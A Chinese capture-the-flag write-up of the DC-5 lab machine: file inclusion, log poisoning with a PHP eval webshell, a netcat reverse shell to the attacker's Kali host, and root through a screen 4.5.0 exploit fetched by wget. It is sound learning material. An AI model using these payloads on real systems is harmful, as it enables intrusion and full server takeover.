当前位置: 首页 > news >正文

DC系列靶机-DC5

news 2025/6/19 22:01:09

一,环境的搭建

VM17 官网下载

kali 2023.4版 https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.4/

靶场文件 https://download.vulnhub.com/dc/DC-5.zip

二,步骤

首先进行主机发现;

根据MAC地址,靶机 IP为:192.168.20.147

接下来端口扫描;

发现80端口是打开的,可以尝试访问一下;

一个普通的页面;

尝试进行一个目录扫描;

存在这样一个页面;

尝试访问;

在contact.php的页面,提交之后,最底下的这个会变化;

想到之前的那个footer.php页面,想到这个thankyou.php页面可能调用了footer.php这个页面;

http://192.168.20.147/thankyou.php?file=footer.php

这里可能存在文件包含漏洞;

尝试包含访问一下/etc/passwd

http://192.168.20.147/thankyou.php?file=../../../../etc/passwd

果然访问到了passwd文件;

尝试利用这个漏洞------>文件包含

访问nignx的错误日志;

file=../../../../var/log/nginx/error.log

日志内容:

			2024/10/17 01:13:37 [error] 560#0: *54419 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou%2ephp HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147"
2024/10/17 01:15:57 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:16:06 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=2&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:16:34 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:17:53 [error] 559#0: *57817 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:32:16 [error] 559#0: *57832 FastCGI sent in stderr: "PHP message: PHP Warning:  include(file=../../../../var/log/nginx/error.log): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
PHP message: PHP Warning:  include(): Failed opening 'file=../../../../var/log/nginx/error.log' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?file=file=../../../../var/log/nginx/error.log HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"

接下来尝试上传webshell;

http://192.168.20.147/thankyou.php?file=<?php @eval($_POST["cmd"]); ?>

尝试使用蚁剑连接;

蚁剑连接成功;

连接地址:http://192.168.20.147/thankyou.php?file=../../../../var/log/nginx/error.log
连接密码:cmd

使用kali进行监听;

nc -lnvp 4444

反弹shell,进行连接;

nc -nv 192.168.20.151 4444 -c /bin/bash

完善交互式界面;

python -c "import pty;pty.spawn('/bin/bash')"

接下来进行提权;

尝试使用suid提权;

find / -perm -4000 2>/dev/null

使用searchsploit(kali自带)搜索screen-4.5.0的历史漏洞;

searchsploit screen 4.5.0

searchsploit -m 41154cp 41154.sh run.shdos2unix run.sh

使用python搭建一个简易的web服务器;

python -m http.server 5555

然后开始下载文件;

wget -c 192.168.20.151:5555/run.sh

脚本文件下载成功;

chmod 777 run.sh
./run.sh

成功拿到root权限,并且在/root目录下拿到了flag;

三,结论

文件包含漏洞的利用;

nc命令的详解;

提权首先查找是否存在可以利用的历史漏洞;

使用python搭建简易的web服务器来上传脚本;

Nginx默认日志文件的路径;


http://www.mrgr.cn/news/51419.html

相关文章:

  • Unity3D 游戏性能优化全流程建设详解
  • 基于Arduino做的“鱿鱼游戏”BOSS面具,支持动作检测
  • 对接优惠折扣影票接口有什么好处?
  • 一款极高性价比的高性能CMOS低压差线性稳压器——ADM7172深度解析与应用简介
  • [vue2] 由mapbox2升级为mapbox3遇到的矢量底图样式丢失问题解决办法
  • linux下编译鸿蒙版boost库
  • PG 17 增量备份功能介绍
  • 手把手教你玩转Midjourney,保姆级教程公开
  • Mac中使用brew安装指定版本软件包
  • [哈工大]战德臣 数据库系统 第3讲 关系模型之基本概念
  • torch运行异常·找不到指定的模块|fbgemm.dll
  • 百年德企科世达颠覆传统报销,依托分贝通实现差旅支出降本百万
  • VMware-Converter-Agent.exe 安装失败
  • 快快网络DDoS安全防护系统抵御了创纪录的 2.35 Tbps DDoS 攻击
  • 深入理解Qt中的QTableView、Model与Delegate机制
  • jvm虚拟机调优实战
  • 715: 字典序问题
  • EasyOCR——超强超便捷的OCR开源算法介绍与文本检测模型CRAFT微调方法
  • python+Mosh网课笔记01
  • WSL2配置代理解决git网络不通畅的问题